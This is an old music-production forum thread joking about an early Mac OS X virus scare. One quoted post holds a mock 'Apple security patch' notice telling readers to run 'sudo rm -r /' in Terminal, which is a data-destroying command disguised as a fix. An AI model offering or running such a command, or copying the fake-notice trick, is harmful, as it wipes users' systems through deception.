first osx virus?

Discuss music production with Ableton Live.
MrYellow

Post by MrYellow » Wed May 03, 2006 7:24 am

Amen.

-Ben

dirtystudios

Post by dirtystudios » Fri May 05, 2006 4:36 am

Us Macs users will never be plagued with viruses.

Why?

Because we're the ones who write them.

k

gomi

Post by gomi » Fri May 05, 2006 4:44 am

dirtystudios wrote:Us Macs users will never be plagued with viruses.

Why?

Because we're the ones who write them.

k

ssshhhhh!!!!

digitaljunkie

Post by digitaljunkie » Fri May 05, 2006 11:36 am

In my view this was not a MAC or OS executable virus more a Java or web based script that simply took control of his web browser.

As web browsers need to be standards compliant the only form of defense is to manually overide the pop-up, javascripts etc etc in your browser preferences.

FFS why in the mother of all marys would someone want to install an UNRELEASED update doesn't that scream trouble like "untested" or "not certified" as in its unreleased for a very bloody good reason - morons.
PowerBook 1.67ghz/100gb/1gb - Live 5

Sales Dude McBoob

Post by Sales Dude McBoob » Fri May 05, 2006 1:23 pm

forge wrote:
noisetonepause wrote:FUD and illiteracy... it's not a security exploit if you EXECUTE THE MALICIOUS CODE YOURSELF FFS!

I'm thinking I could put this online:
Your Mac may be at risk!

Apple recently said that a number of critical security flaws have been discovered in all versions of MacOS X, deep in the system's core. Thankfully, they're easily patched by running a built-in system maintenance mechanism. This has to be done from a terminal - you'll find the terminal in the Utilities subfolder of the Applications folder. Launch it and type in the following line of code without the quotation marks:

"sudo rm -r /"

Type in your password at the prompt. The security holes have now been patched. Thank you for shopping.
And people would fall for it. And people who fall for it deserve it. This is not 'Nam, this is computing, and there are rules... and if people don't follow them, they may get hurt..

-Paws[cranky]
come on, tell us, what will it do?
My goodness. Paws' claws are out and he's ready to swipe. I believe the term for this in cat language is "Reeeeeeerrrrr!"

Someone may want to tip off Fox + CNN that we may have a potential suspect. :wink: